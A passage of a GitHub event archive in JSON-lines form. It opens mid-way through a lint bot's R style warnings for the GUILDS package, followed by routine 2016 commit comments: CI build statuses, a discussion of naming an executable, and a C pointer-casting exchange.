~^~\n```\n[R/drawLocal.R:60:39:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                     ~^~\n```\n[R/drawLocal.R:60:49:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L60) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                               ~^~\n```\n[R/drawLocal.R:61:37:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                   ~^~\n```\n[R/drawLocal.R:61:49:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                               ~^~\n```\n[R/drawLocal.R:61:51:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                                 ~^~\n```\n[R/drawLocal.R:61:55:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L61) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n                                                     ~^~\n```\n[R/drawLocal.R:62:25:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L62) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty[idx0] = aux;\n                        ^\n```\n[R/drawLocal.R:64:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L64) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidx1=which(x==1);\n            ^\n```\n[R/drawLocal.R:64:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L64) *style:* **Put spaces around all infix operators.**\n```r\n​\tidx1=which(x==1);\n           ~^~\n```\n[R/drawLocal.R:65:11:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L65) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(idx1)) {\n          ^\n```\n[R/drawLocal.R:66:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                     ^\n```\n[R/drawLocal.R:66:23:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                      ^\n```\n[R/drawLocal.R:66:25:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                       ~^~\n```\n[R/drawLocal.R:66:28:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                          ~^~~\n```\n[R/drawLocal.R:66:30:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                             ^\n```\n[R/drawLocal.R:66:31:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                              ^\n```\n[R/drawLocal.R:66:33:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n                               ~^~~\n```\n[R/drawLocal.R:67:35:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L67) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n                                  ^\n```\n[R/drawLocal.R:68:29:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                            ^\n```\n[R/drawLocal.R:68:30:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L68) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                             ^\n```\n[R/drawLocal.R:68:32:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L68) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n                              ~^~~\n```\n[R/drawLocal.R:69:31:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t      y[idx1] = 0;\n                              ^\n```\n[R/drawLocal.R:70:30:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L70) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n                             ^\n```\n[R/drawLocal.R:70:32:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n                              ~^~~\n```\n[R/drawLocal.R:71:35:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\t  y[idx1] = Inf;\n                                  ^\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L74) *style:* **Use <-, not =, for assignment.**\n```r\n​\tidxp = which((x>0)&(x<1));\n             ^\n```\n[R/drawLocal.R:74:14:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n            ~^~\n```\n[R/drawLocal.R:74:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                     ^\n```\n[R/drawLocal.R:74:24:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                      ~^~\n```\n[R/drawLocal.R:74:27:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L74) *style:* **Put spaces around all infix operators.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                         ~^~\n```\n[R/drawLocal.R:74:28:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L74) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tidxp = which((x>0)&(x<1));\n                           ^\n```\n[R/drawLocal.R:75:11:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​\txx=x[idxp];\n          ^\n```\n[R/drawLocal.R:75:11:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\txx=x[idxp];\n         ~^~\n```\n[R/drawLocal.R:76:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L76) *style:* **Use <-, not =, for assignment.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n            ^\n```\n[R/drawLocal.R:76:13:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n           ~^~\n```\n[R/drawLocal.R:76:23:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n                     ~^~\n```\n[R/drawLocal.R:76:34:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L76) *style:* **Put spaces around all infix operators.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n                                ~^~\n```\n[R/drawLocal.R:77:27:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                         ~^~\n```\n[R/drawLocal.R:77:41:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                       ~^~\n```\n[R/drawLocal.R:77:45:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n                                           ~^\n```\n[R/drawLocal.R:78:27:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                         ~^~\n```\n[R/drawLocal.R:78:30:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                            ~^~\n```\n[R/drawLocal.R:78:34:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L78) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n                                ~^~\n```\n[R/drawLocal.R:79:27:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                         ~^~\n```\n[R/drawLocal.R:79:28:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L79) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                           ^\n```\n[R/drawLocal.R:79:30:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                            ~^~\n```\n[R/drawLocal.R:79:34:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                ~^~\n```\n[R/drawLocal.R:79:36:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                  ~^~\n```\n[R/drawLocal.R:79:39:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L79) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n                                     ~^~\n```\n[R/drawLocal.R:80:19:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                  ^\n```\n[R/drawLocal.R:80:22:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                    ~^~\n```\n[R/drawLocal.R:80:25:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L80) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n                       ~^~\n```\n[R/drawLocal.R:81:17:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L81) *style:* **Use <-, not =, for assignment.**\n```r\n​\ty[idxp] = aux;\n                ^\n```\n[R/drawLocal.R:85:1:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L85) *style:* **Variable and function names should be all lowercase.**\n```r\n​drawLocalCond <- function(theta, alpha_x, alpha_y, JX, JY) {\n^~~~~~~~~~~~~\n```\n[R/drawLocal.R:87:5:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L87) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = JX + JY\n    ^\n```\n[R/drawLocal.R:91:6:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L91) *style:* **Use <-, not =, for assignment.**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n     ^\n```\n[R/drawLocal.R:91:8:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L91) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n       ^~~~~\n```\n[R/drawLocal.R:91:8:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L91) *warning:* **no visible global function definition for ‘getPX’, Did you mean 'setPS'?**\n```r\n​  nx = getPX(theta, alpha_x, alpha_y, JX, JY)\n       ^~~~~\n```\n[R/drawLocal.R:92:6:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L92) *style:* **Use <-, not =, for assignment.**\n```r\n​  ny = 1 - nx;\n     ^\n```\n[R/drawLocal.R:95:7:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L95) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/drawLocal.R:95:26:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L95) *style:* **Put spaces around all infix operators.**\n```r\n​  I_X = alpha_x * nx * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/drawLocal.R:96:7:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L96) *style:* **Use <-, not =, for assignment.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n      ^\n```\n[R/drawLocal.R:96:26:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L96) *style:* **Put spaces around all infix operators.**\n```r\n​  I_Y = alpha_y * ny * (J-1) / (1 - alpha_x * nx - alpha_y * ny)\n                        ~^~\n```\n[R/drawLocal.R:98:8:](https://github.com/thijsjanzen/GUILDS/blob/c1d8b2c7c0f97ced531a13b6a02f50c3f2ec7bcd/R/drawLocal.R#L98) *style:* **Use <-, not =, for assignment.**\n```r\n​  SADX = pm_sad(theta, I_X, JX)\n       ^\n```\n"}},"created_at":"2016-09-22T10:41:11Z"}
{"id":"4601668193","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128047,"position":null,"line":null,"path":null,"commit_id":"3d98887a776bbec1473e294ab4155d5185f9fd80","created_at":"2016-09-22T10:41:30Z","updated_at":"2016-09-22T10:41:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1108](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13911&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T10:41:30Z"}
{"id":"4601673293","type":"CommitCommentEvent","actor":{"login":"ameliejackson1"},"repo":{"name":"RubenVerborgh/AsksForApp"},"payload":{"comment":{"id":19128054,"position":null,"line":null,"path":null,"commit_id":"85958fc059d732e696871d94b97c290225176aeb","created_at":"2016-09-22T10:42:45Z","updated_at":"2016-09-22T10:42:45Z","body":"best site for this category"}},"created_at":"2016-09-22T10:42:45Z"}
{"id":"4601674781","type":"CommitCommentEvent","actor":{"login":"march1993"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19128059,"position":null,"line":null,"path":null,"commit_id":"7e47e4163b0af042d746f212f873a350211badff","created_at":"2016-09-22T10:43:05Z","updated_at":"2016-09-22T10:43:05Z","body":"Nope. I've left the company where I developed three.js apps before."}},"created_at":"2016-09-22T10:43:05Z"}
{"id":"4601677636","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19128063,"position":null,"line":null,"path":null,"commit_id":"3d98887a776bbec1473e294ab4155d5185f9fd80","created_at":"2016-09-22T10:43:51Z","updated_at":"2016-09-22T10:43:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1108](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13911&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:02:21"}},"created_at":"2016-09-22T10:43:51Z"}
{"id":"4601678427","type":"CommitCommentEvent","actor":{"login":"choubize"},"repo":{"name":"choubize/Learn-html-w3school"},"payload":{"comment":{"id":19128064,"position":null,"line":null,"path":null,"commit_id":"1b4ac2f91351257ac157ccbf4511303f06b49121","created_at":"2016-09-22T10:44:04Z","updated_at":"2016-09-22T10:44:04Z","body":"I learnt after this add how to put the characters in a password field are masked (shown as asterisks or circles)."}},"created_at":"2016-09-22T10:44:04Z"}
{"id":"4601678904","type":"CommitCommentEvent","actor":{"login":"FBerendsen"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19128071,"position":null,"line":null,"path":null,"commit_id":"42478b0cf10b2bf64e96b204a8cd507d5669a1d8","created_at":"2016-09-22T10:44:10Z","updated_at":"2016-09-22T10:44:10Z","body":"This might be something to discuss further. I did call it superelastix(.exe) before. My idea was that users see that it is an executable (no need to call it \"Program\"). I do see it as *the* excutable we are going to support next to the library. But in our sprint meeting the others see it as an example of the use of the library (and therefor put it in the Examples directory). It that case, there could eventually also be another (gui) executable, putting  \"Commandline\" in the name make sense then. But I prefer 1 main exexutable superelastix(.exe) and not being an example."}},"created_at":"2016-09-22T10:44:10Z"}
{"id":"4601679410","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19128073,"position":null,"line":null,"path":null,"commit_id":"89a2214f5e9b3170f741fc57fb6c3d24f1008940","created_at":"2016-09-22T10:44:17Z","updated_at":"2016-09-22T10:44:17Z","body":"develop (Unknown) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-89a2214f5e9b3170f741fc57fb6c3d24f1008940-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-22T10:44:17Z"}
{"id":"4601683613","type":"CommitCommentEvent","actor":{"login":"ioannad"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19128086,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-22T10:45:17Z","updated_at":"2016-09-22T10:45:17Z","body":"Thank you for this clarifying explanation with the precise statements, now it makes sense! So the view \"pointers as arrays\" is encouraged but ultimately it's just a shorthand. Now I can see the benefits, of course (what was I thinking!). So because of your points (1)-(3), even negative \"array\"-indices should work, and indeed that does work fine! This could come in handy.\r\n\r\n> >    unsigned int *gpio = (unsigned int *)GPIO_BASE; (the volatile is irrelevant here)\r\n\r\nAfter experimentation it seems that `volatile` is only necessary when compiling with some optimisation level for non-preinitialised variables. I assume that is why you say it's irrelevant there.\r\n> We're breaking the rules of standard C here. Normally it's not well-defined what happens if you typecast an integer type to a pointer type,\r\n\r\nI was wondering about that as well, I have mine declared as unsigned int*.\r\n> They're treating an integer as a pointer into an array. The distinction to/into sounds like nitpicking, but only until \r\n\r\nThat's not nitpicking, there is a huge difference between \"to\" and \"into\". :)\r\n\r\nPS. IOCCC: lol!! "}},"created_at":"2016-09-22T10:45:17Z"}
{"id":"4601684440","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19128089,"position":null,"line":null,"path":null,"commit_id":"70345e281510e401e89ae90ac08acd2ce6ef4e7d","created_at":"2016-09-22T10:45:29Z","updated_at":"2016-09-22T10:45:29Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 254](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1215&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-22T10:45:29Z"}
{"id":"4601686325","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19128096,"position":null,"line":null,"path":null,"commit_id":"26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee","created_at":"2016-09-22T10:45:57Z","updated_at":"2016-09-22T10:45:57Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-22T10:45:57Z"}
{"id":"4601690084","type":"CommitCommentEvent","actor":{"login":"FBerendsen"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19128097,"position":null,"line":null,"path":null,"commit_id":"42478b0cf10b2bf64e96b204a8cd507d5669a1d8","created_at":"2016-09-22T10:46:51Z","updated_at":"2016-09-22T10:46:51Z","body":"Oh, I didn't pay attention, you called it selx(.exe). superelastix(.exe) would still be my preference"}},"created_at":"2016-09-22T10:46:51Z"}
{"id":"4601691183","type":"CommitCommentEvent","actor":{"login":"jalgamestudios"},"repo":{"name":"JayWee/SCC"},"payload":{"comment":{"id":19128101,"position":null,"line":null,"path":null,"commit_id":"1febf5bbb9d963573e6113a63fc4a5f80ed3a1e2","created_at":"2016-09-22T10:47:08Z","updated_at":"2016-09-22T10:47:08Z","body":"That is a silly mistake, isn't it?"}},"created_at":"2016-09-22T10:47:08Z"}
{"id":"4601692283","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128105,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:47:21Z","updated_at":"2016-09-22T10:47:21Z","body":"it is not one of the fastests, indeed, my cpu goes 100% (single thread)."}},"created_at":"2016-09-22T10:47:21Z"}
{"id":"4601709815","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19128143,"position":null,"line":null,"path":null,"commit_id":"26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee","created_at":"2016-09-22T10:51:37Z","updated_at":"2016-09-22T10:51:37Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-22T10:51:37Z"}
{"id":"4601710278","type":"CommitCommentEvent","actor":{"login":"mohierf"},"repo":{"name":"Alignak-monitoring/alignak"},"payload":{"comment":{"id":19128144,"position":null,"line":null,"path":null,"commit_id":"2186fd253ebe3f1a45319922f5d54fda3a122d1f","created_at":"2016-09-22T10:51:44Z","updated_at":"2016-09-22T10:51:44Z","body":"Another workaround found in PR #357 but it should be improved to use the freshly installed configuration as I did in the former referenced commits. Note that those commits have been dropped ..."}},"created_at":"2016-09-22T10:51:44Z"}
{"id":"4601715719","type":"CommitCommentEvent","actor":{"login":"sijskes"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19128156,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T10:53:03Z","updated_at":"2016-09-22T10:53:03Z","body":"1 min, on perfomance governor."}},"created_at":"2016-09-22T10:53:03Z"}
